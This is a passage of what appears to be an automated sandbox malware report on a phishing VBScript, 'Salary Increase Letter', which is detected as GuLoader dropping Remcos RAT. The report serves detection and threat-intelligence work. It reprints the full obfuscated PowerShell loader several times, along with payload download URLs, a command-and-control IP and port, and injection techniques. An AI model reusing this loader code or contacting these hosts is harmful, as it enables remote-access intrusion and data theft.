              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" " <#italomania strangulations drhammernes waldglas #>;$visualist='aktivitetspdagogikkens';<#castilianskes celleforskning slobbish malakon nedjusteres fyg reinterrupt #>;$startsymbols=$skjaldedigtets+$host.ui;if ($startsymbols) {$amatrskuespillerne++;}function fanebrere($visceroskeletal){$salgsvarerne=$menazons+$visceroskeletal.'length'-$amatrskuespillerne; for( $overcommited=3;$overcommited -lt $salgsvarerne;$overcommited+=4){$procentdels++;$stikbrevenes+=$visceroskeletal[$overcommited];$outparagon='dermatologies';}$stikbrevenes;}function halvraaddent($landskatterets){ & ($jamredes) ($landskatterets);}$successionernes=fanebrere 'phom arofarzbruinonlmyol suatri/ p, ';$successionernes+=fanebrere ',al5 in.rai0st gk( aws eiskinpandkvio liwridsem koln nktgru km1 la0f n.sht0mot;ele hypwutrimesn sn6s,i4 o; ma oplxgla6fer4uun;grf .arpnevrec:red1per3cra1sc . g,0 so) .a ridgflievogcejek udovol/ on2ce 0rip1und0 ac0 io1 co0s,u1 el estfunci inrdirejugf mpo rex bo/non1akt3,hu1 i.di 0i,t ';$pengehistorier=fanebrere 'vaaufrishu.e ewrapo-folalibgp.ceexsn ritsul ';$ooziness=fanebrere 'cochfort sut sep,re:cam/res/foultinn.nt6re bras9 de. a.s unhsp.os mp,or/ trepoloentyflalhe prkecgr y dofafr/ taptebat.eastesim kse,n ,knsreepedlkassloneswosfin. iufar3 pr2mot ';$casbah=fanebrere 'pre>non ';$jamredes=fanebrere ' skispie dsx ma ';$reagitation='intertrace';$jvningers='\foregrib.ses';halvraaddent (fanebrere ' b,$mi.gzo,l omoclobr tataklpar: agipronslidresyaf lkegi stcgra=ur.$le e rinslav ro:unsaopipflgpvapdal aspet rearap+gla$st,jchlvvisngali rancaegopde rirpuns d, ');halvraaddent (fanebrere ' de$epigvanlsproc obkomafoolhoi:bo,p orypr.rnagh.tveratlo.rigynorgem s etittcomechermo.s bo=sa $actostaop.kz .ri l nzi e visu sspar. .rssprp lal t.ikretpro(bes$smocfora husu nb llaundhslo) o ');halvraaddent (fanebrere 'sma[ sknexoegentund.untsbilebilrkrovstri d cr se rnpn,ko liidisnen tpaumbisa esn tea rogrioegrarbis]k.n:non:stassubestrcin ufrer faiejettany lipalbr,aros etpq,oc.bc mooslolrac pro=a.e p c[ unn .rea btuna. mastroes bcsupu imrslyi.erttraychupprora sobartu so.itcb totu lseltassy hapdrieapl]for: k :unitembl lasuni1unm2 uf ');$ooziness=$pyrheliometers[0];$bouw=(fanebrere 'b y$forguoplstooa dbgisa ualu.c:cretan utorrhe bethomattbacsmok= n npoleratwski- s.oskab spjejeecoucgodtatr tegs bayflosiritbise ukmsni. ovnfluepsytvul.cypw c,ebarbp,cc k l doiunce arno tt.oo ');halvraaddent ($bouw);halvraaddent (fanebrere 'rag$unftsphuundrspib .noin tt.xs fo.pr he.iebefaprod.are udrphys ki[pla$prop rseundndefgunreforhcari buss.mts eo efr uli queju.rber]far= th$r,lselausubcko csasesess sas nei ,iopu,nerse atrknsnspeepapskh, ');$ondskabsfuldhed29=fanebrere ' fl$fo t kourdsr hbmacocyntdagsin..e kdsk,o r wf rn pel ykos ta ,ldlitffreiim lb heorr(tro$iveomoposliz h,igrun bae ulsknoskal,sla$ex t ardigkcroaagggh resqurp,esafv)til ';$trkagers=$indylic;halvraadde
              Source: unknownProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" " <#italomania strangulations drhammernes waldglas #>;$visualist='aktivitetspdagogikkens';<#castilianskes celleforskning slobbish malakon nedjusteres fyg reinterrupt #>;$startsymbols=$skjaldedigtets+$host.ui;if ($startsymbols) {$amatrskuespillerne++;}function fanebrere($visceroskeletal){$salgsvarerne=$menazons+$visceroskeletal.'length'-$amatrskuespillerne; for( $overcommited=3;$overcommited -lt $salgsvarerne;$overcommited+=4){$procentdels++;$stikbrevenes+=$visceroskeletal[$overcommited];$outparagon='dermatologies';}$stikbrevenes;}function halvraaddent($landskatterets){ & ($jamredes) ($landskatterets);}$successionernes=fanebrere 'phom arofarzbruinonlmyol suatri/ p, ';$successionernes+=fanebrere ',al5 in.rai0st gk( aws eiskinpandkvio liwridsem koln nktgru km1 la0f n.sht0mot;ele hypwutrimesn sn6s,i4 o; ma oplxgla6fer4uun;grf .arpnevrec:red1per3cra1sc . g,0 so) .a ridgflievogcejek udovol/ on2ce 0rip1und0 ac0 io1 co0s,u1 el estfunci inrdirejugf mpo rex bo/non1akt3,hu1 i.di 0i,t ';$pengehistorier=fanebrere 'vaaufrishu.e ewrapo-folalibgp.ceexsn ritsul ';$ooziness=fanebrere 'cochfort sut sep,re:cam/res/foultinn.nt6re bras9 de. a.s unhsp.os mp,or/ trepoloentyflalhe prkecgr y dofafr/ taptebat.eastesim kse,n ,knsreepedlkassloneswosfin. iufar3 pr2mot ';$casbah=fanebrere 'pre>non ';$jamredes=fanebrere ' skispie dsx ma ';$reagitation='intertrace';$jvningers='\foregrib.ses';halvraaddent (fanebrere ' b,$mi.gzo,l omoclobr tataklpar: agipronslidresyaf lkegi stcgra=ur.$le e rinslav ro:unsaopipflgpvapdal aspet rearap+gla$st,jchlvvisngali rancaegopde rirpuns d, ');halvraaddent (fanebrere ' de$epigvanlsproc obkomafoolhoi:bo,p orypr.rnagh.tveratlo.rigynorgem s etittcomechermo.s bo=sa $actostaop.kz .ri l nzi e visu sspar. .rssprp lal t.ikretpro(bes$smocfora husu nb llaundhslo) o ');halvraaddent (fanebrere 'sma[ sknexoegentund.untsbilebilrkrovstri d cr se rnpn,ko liidisnen tpaumbisa esn tea rogrioegrarbis]k.n:non:stassubestrcin ufrer faiejettany lipalbr,aros etpq,oc.bc mooslolrac pro=a.e p c[ unn .rea btuna. mastroes bcsupu imrslyi.erttraychupprora sobartu so.itcb totu lseltassy hapdrieapl]for: k :unitembl lasuni1unm2 uf ');$ooziness=$pyrheliometers[0];$bouw=(fanebrere 'b y$forguoplstooa dbgisa ualu.c:cretan utorrhe bethomattbacsmok= n npoleratwski- s.oskab spjejeecoucgodtatr tegs bayflosiritbise ukmsni. ovnfluepsytvul.cypw c,ebarbp,cc k l doiunce arno tt.oo ');halvraaddent ($bouw);halvraaddent (fanebrere 'rag$unftsphuundrspib .noin tt.xs fo.pr he.iebefaprod.are udrphys ki[pla$prop rseundndefgunreforhcari buss.mts eo efr uli queju.rber]far= th$r,lselausubcko csasesess sas nei ,iopu,nerse atrknsnspeepapskh, ');$ondskabsfuldhed29=fanebrere ' fl$fo t kourdsr hbmacocyntdagsin..e kdsk,o r wf rn pel ykos ta ,ldlitffreiim lb heorr(tro$iveomoposliz h,igrun bae ulsknoskal,sla$ex t ardigkcroaagggh resqurp,esafv)til ';$trkagers=$indylic;halvraadde
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" " <#italomania strangulations drhammernes waldglas #>;$visualist='aktivitetspdagogikkens';<#castilianskes celleforskning slobbish malakon nedjusteres fyg reinterrupt #>;$startsymbols=$skjaldedigtets+$host.ui;if ($startsymbols) {$amatrskuespillerne++;}function fanebrere($visceroskeletal){$salgsvarerne=$menazons+$visceroskeletal.'length'-$amatrskuespillerne; for( $overcommited=3;$overcommited -lt $salgsvarerne;$overcommited+=4){$procentdels++;$stikbrevenes+=$visceroskeletal[$overcommited];$outparagon='dermatologies';}$stikbrevenes;}function halvraaddent($landskatterets){ & ($jamredes) ($landskatterets);}$successionernes=fanebrere 'phom arofarzbruinonlmyol suatri/ p, ';$successionernes+=fanebrere ',al5 in.rai0st gk( aws eiskinpandkvio liwridsem koln nktgru km1 la0f n.sht0mot;ele hypwutrimesn sn6s,i4 o; ma oplxgla6fer4uun;grf .arpnevrec:red1per3cra1sc . g,0 so) .a ridgflievogcejek udovol/ on2ce 0rip1und0 ac0 io1 co0s,u1 el estfunci inrdirejugf mpo rex bo/non1akt3,hu1 i.di 0i,t ';$pengehistorier=fanebrere 'vaaufrishu.e ewrapo-folalibgp.ceexsn ritsul ';$ooziness=fanebrere 'cochfort sut sep,re:cam/res/foultinn.nt6re bras9 de. a.s unhsp.os mp,or/ trepoloentyflalhe prkecgr y dofafr/ taptebat.eastesim kse,n ,knsreepedlkassloneswosfin. iufar3 pr2mot ';$casbah=fanebrere 'pre>non ';$jamredes=fanebrere ' skispie dsx ma ';$reagitation='intertrace';$jvningers='\foregrib.ses';halvraaddent (fanebrere ' b,$mi.gzo,l omoclobr tataklpar: agipronslidresyaf lkegi stcgra=ur.$le e rinslav ro:unsaopipflgpvapdal aspet rearap+gla$st,jchlvvisngali rancaegopde rirpuns d, ');halvraaddent (fanebrere ' de$epigvanlsproc obkomafoolhoi:bo,p orypr.rnagh.tveratlo.rigynorgem s etittcomechermo.s bo=sa $actostaop.kz .ri l nzi e visu sspar. .rssprp lal t.ikretpro(bes$smocfora husu nb llaundhslo) o ');halvraaddent (fanebrere 'sma[ sknexoegentund.untsbilebilrkrovstri d cr se rnpn,ko liidisnen tpaumbisa esn tea rogrioegrarbis]k.n:non:stassubestrcin ufrer faiejettany lipalbr,aros etpq,oc.bc mooslolrac pro=a.e p c[ unn .rea btuna. mastroes bcsupu imrslyi.erttraychupprora sobartu so.itcb totu lseltassy hapdrieapl]for: k :unitembl lasuni1unm2 uf ');$ooziness=$pyrheliometers[0];$bouw=(fanebrere 'b y$forguoplstooa dbgisa ualu.c:cretan utorrhe bethomattbacsmok= n npoleratwski- s.oskab spjejeecoucgodtatr tegs bayflosiritbise ukmsni. ovnfluepsytvul.cypw c,ebarbp,cc k l doiunce arno tt.oo ');halvraaddent ($bouw);halvraaddent (fanebrere 'rag$unftsphuundrspib .noin tt.xs fo.pr he.iebefaprod.are udrphys ki[pla$prop rseundndefgunreforhcari buss.mts eo efr uli queju.rber]far= th$r,lselausubcko csasesess sas nei ,iopu,nerse atrknsnspeepapskh, ');$ondskabsfuldhed29=fanebrere ' fl$fo t kourdsr hbmacocyntdagsin..e kdsk,o r wf rn pel ykos ta ,ldlitffreiim lb heorr(tro$iveomoposliz h,igrun bae ulsknoskal,sla$ex t ardigkcroaagggh resqurp,esafv)til ';$trkagers=$indylic;halvraaddeJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

              Stealing of Sensitive Information

              barindex
              Yara detected Remcos RAT
              Source: Yara matchFile source: 0000000D.00000002.2588683839.00000000099F9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000D.00000002.2588683839.0000000009A0D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000D.00000002.2588683839.0000000009A23000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: msiexec.exe PID: 8064, type: MEMORYSTR

              Remote Access Functionality

              barindex
              Detected Remcos RAT
              Source: C:\Windows\SysWOW64\msiexec.exeMutex created: \Sessions\1\BaseNamedObjects\Rmc-KC5V8FJump to behavior
              Yara detected Remcos RAT
              Source: Yara matchFile source: 0000000D.00000002.2588683839.00000000099F9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000D.00000002.2588683839.0000000009A0D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000D.00000002.2588683839.0000000009A23000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: msiexec.exe PID: 8064, type: MEMORYSTR

              Mitre Att&ck Matrix

              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity Information321
              Scripting              		Valid Accounts11
              Windows Management Instrumentation              		321
              Scripting              		311
              Process Injection              		1
              Masquerading              		OS Credential Dumping111
              Security Software Discovery              		Remote Services1
              Archive Collected Data              		1
              Encrypted Channel              		Exfiltration Over Other Network MediumAbuse Accessibility Features
              CredentialsDomainsDefault Accounts2
              Command and Scripting Interpreter              		1
              DLL Side-Loading              		1
              DLL Side-Loading              		31
              Virtualization/Sandbox Evasion              		LSASS Memory1
              Process Discovery              		Remote Desktop ProtocolData from Removable Media1
              Non-Standard Port              		Exfiltration Over BluetoothNetwork Denial of Service
              Email AddressesDNS ServerDomain Accounts1
              Exploitation for Client Execution              		Logon Script (Windows)Logon Script (Windows)311
              Process Injection              		Security Account Manager31
              Virtualization/Sandbox Evasion              		SMB/Windows Admin SharesData from Network Shared Drive1
              Remote Access Software              		Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal Accounts2
              PowerShell              		Login HookLogin Hook2
              Obfuscated Files or Information              		NTDS1
              Application Window Discovery              		Distributed Component Object ModelInput Capture1
              Ingress Tool Transfer              		Traffic DuplicationData Destruction
              Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
              Software Packing              		LSA Secrets1
              File and Directory Discovery              		SSHKeylogging2
              Non-Application Layer Protocol              		Scheduled TransferData Encrypted for Impact
              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
              DLL Side-Loading              		Cached Domain Credentials13
              System Information Discovery              		VNCGUI Input Capture112
              Application Layer Protocol              		Data Transfer Size LimitsService Stop

              Behavior Graph

              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet
              behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1533043 Sample: Salary Increase Letter_Oct ... Startdate: 14/10/2024 Architecture: WINDOWS Score: 100 31 ln6b9.shop 2->31 33 geoplugin.net 2->33 41 Suricata IDS alerts for network traffic 2->41 43 Found malware configuration 2->43 45 Yara detected GuLoader 2->45 47 8 other signatures 2->47 8 powershell.exe 18 2->8         started        11 wscript.exe 1 2->11         started        signatures3 process4 signatures5 49 Early bird code injection technique detected 8->49 51 Writes to foreign memory regions 8->51 53 Found suspicious powershell code related to unpacking or dynamic code loading 8->53 55 Queues an APC in another process (thread injection) 8->55 13 msiexec.exe 3 13 8->13         started        17 conhost.exe 8->17         started        57 VBScript performs obfuscated calls to suspicious functions 11->57 59 Suspicious powershell command line found 11->59 61 Wscript starts Powershell (via cmd or directly) 11->61 63 2 other signatures 11->63 19 powershell.exe 14 18 11->19         started        process6 dnsIp7 35 154.216.17.14, 2404, 49976, 49977 SKHT-ASShenzhenKatherineHengTechnologyInformationCo Seychelles 13->35 37 geoplugin.net 178.237.33.50, 49978, 80 ATOM86-ASATOM86NL Netherlands 13->37 65 Detected Remcos RAT 13->65 21 msiexec.exe 13->21         started        23 msiexec.exe 13->23         started        25 msiexec.exe 13->25         started        29 26 other processes 13->29 39 ln6b9.shop 172.67.128.117, 49716, 49975, 80 CLOUDFLARENETUS United States 19->39 67 Found suspicious powershell code related to unpacking or dynamic code loading 19->67 27 conhost.exe 19->27         started        signatures8 process9

              Screenshots

              Thumbnails

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand

              Antivirus, Machine Learning and Genetic Malware Detection

              Initial Sample

              SourceDetectionScannerLabelLink
              Salary Increase Letter_Oct 2024.vbs3%ReversingLabs

              Dropped Files

              No Antivirus matches

              Unpacked PE Files

              No Antivirus matches

              Domains

              No Antivirus matches

              URLs

              SourceDetectionScannerLabelLink
              http://nuget.org/NuGet.exe0%URL Reputationsafe
              http://www.imvu.comr0%URL Reputationsafe
              http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
              https://go.micro0%URL Reputationsafe
              https://contoso.com/License0%URL Reputationsafe
              http://www.imvu.com0%URL Reputationsafe
              https://contoso.com/Icon0%URL Reputationsafe
              http://geoplugin.net/json.gp0%URL Reputationsafe
              https://aka.ms/pscore6lB0%URL Reputationsafe
              https://contoso.com/0%URL Reputationsafe
              https://nuget.org/nuget.exe0%URL Reputationsafe
              https://aka.ms/pscore680%URL Reputationsafe
              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
              http://crl.v0%URL Reputationsafe
              http://www.ebuddy.com0%URL Reputationsafe

              Domains and IPs

              Contacted Domains

              NameIPActiveMaliciousAntivirus DetectionReputation
              bg.microsoft.map.fastly.net
              		199.232.210.172
              		truefalse
                		unknown
                geoplugin.net
                		178.237.33.50
                		truefalse
                  		unknown
                  ln6b9.shop
                  		172.67.128.117
                  		truefalse
                    		unknown

                    Contacted URLs

                    NameMaliciousAntivirus DetectionReputation
                    http://ln6b9.shop/eOYLpCyF/Paasknnelses.u32false
                      		unknown
                      http://geoplugin.net/json.gpfalse
                      • URL Reputation: safe
                      		unknown
                      154.216.17.14true
                        		unknown
                        http://ln6b9.shop/ZQVTKaPS/GtsQMOeeUIHdk195.binfalse
                          		unknown

                          URLs from Memory and Binaries

                          NameSourceMaliciousAntivirus DetectionReputation
                          http://nuget.org/NuGet.exepowershell.exe, 00000008.00000002.1441853777.000001B5E4687000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1635429037.00000000057FE000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          http://www.imvu.comrmsiexec.exe, 0000000D.00000002.2589045347.000000000B420000.00000040.10000000.00040000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          http://pesterbdd.com/images/Pester.pngpowershell.exe, 0000000A.00000002.1618100382.00000000048E7000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 0000000A.00000002.1618100382.00000000048E7000.00000004.00000800.00020000.00000000.sdmpfalse
                            		unknown
                            https://go.micropowershell.exe, 00000008.00000002.1415702842.000001B5D51BF000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            http://crl.microBpowershell.exe, 0000000A.00000002.1643140338.0000000006F40000.00000004.00000020.00020000.00000000.sdmpfalse
                              		unknown
                              https://contoso.com/Licensepowershell.exe, 0000000A.00000002.1635429037.00000000057FE000.00000004.00000800.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              		unknown
                              http://www.imvu.commsiexec.exe, 0000000D.00000002.2589045347.000000000B420000.00000040.10000000.00040000.00000000.sdmpfalse
                              • URL Reputation: safe
                              		unknown
                              https://contoso.com/Iconpowershell.exe, 0000000A.00000002.1635429037.00000000057FE000.00000004.00000800.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              		unknown
                              https://github.com/Pester/Pesterpowershell.exe, 0000000A.00000002.1618100382.00000000048E7000.00000004.00000800.00020000.00000000.sdmpfalse
                                		unknown
                                http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.commsiexec.exe, 0000000D.00000002.2589045347.000000000B420000.00000040.10000000.00040000.00000000.sdmpfalse
                                  		unknown
                                  https://www.google.commsiexec.exe, 0000000D.00000002.2589045347.000000000B420000.00000040.10000000.00040000.00000000.sdmpfalse
                                    		unknown
                                    http://ln6b9.shop/ZQVTKaPS/GtsQMOeeUIHdk195.bin#msiexec.exe, 0000000D.00000002.2588683839.00000000099F9000.00000004.00000020.00020000.00000000.sdmpfalse
                                      		unknown
                                      https://aka.ms/pscore6lBpowershell.exe, 0000000A.00000002.1618100382.0000000004791000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • URL Reputation: safe
                                      		unknown
                                      http://ln6b9.shoppowershell.exe, 00000008.00000002.1415702842.000001B5D4835000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1415702842.000001B5D63A1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1415702842.000001B5D6052000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		unknown
                                        https://contoso.com/powershell.exe, 0000000A.00000002.1635429037.00000000057FE000.00000004.00000800.00020000.00000000.sdmpfalse
                                        • URL Reputation: safe
                                        		unknown
                                        https://nuget.org/nuget.exepowershell.exe, 00000008.00000002.1441853777.000001B5E4687000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1635429037.00000000057FE000.00000004.00000800.00020000.00000000.sdmpfalse
                                        • URL Reputation: safe
                                        		unknown
                                        http://crl.microsoftmB4powershell.exe, 0000000A.00000002.1643140338.0000000006FA3000.00000004.00000020.00020000.00000000.sdmpfalse
                                          		unknown
                                          http://ln6b9.shop/eOYLpCyF/Paasknnelses.u32XRpowershell.exe, 0000000A.00000002.1618100382.00000000048E7000.00000004.00000800.00020000.00000000.sdmpfalse
                                            		unknown
                                            https://aka.ms/pscore68powershell.exe, 00000008.00000002.1415702842.000001B5D4611000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • URL Reputation: safe
                                            		unknown
                                            http://ln6b9.shop/ZQVTKaPS/GtsQMOeeUIHdk195.binqmsiexec.exe, 0000000D.00000002.2588683839.00000000099F9000.00000004.00000020.00020000.00000000.sdmpfalse
                                              		unknown
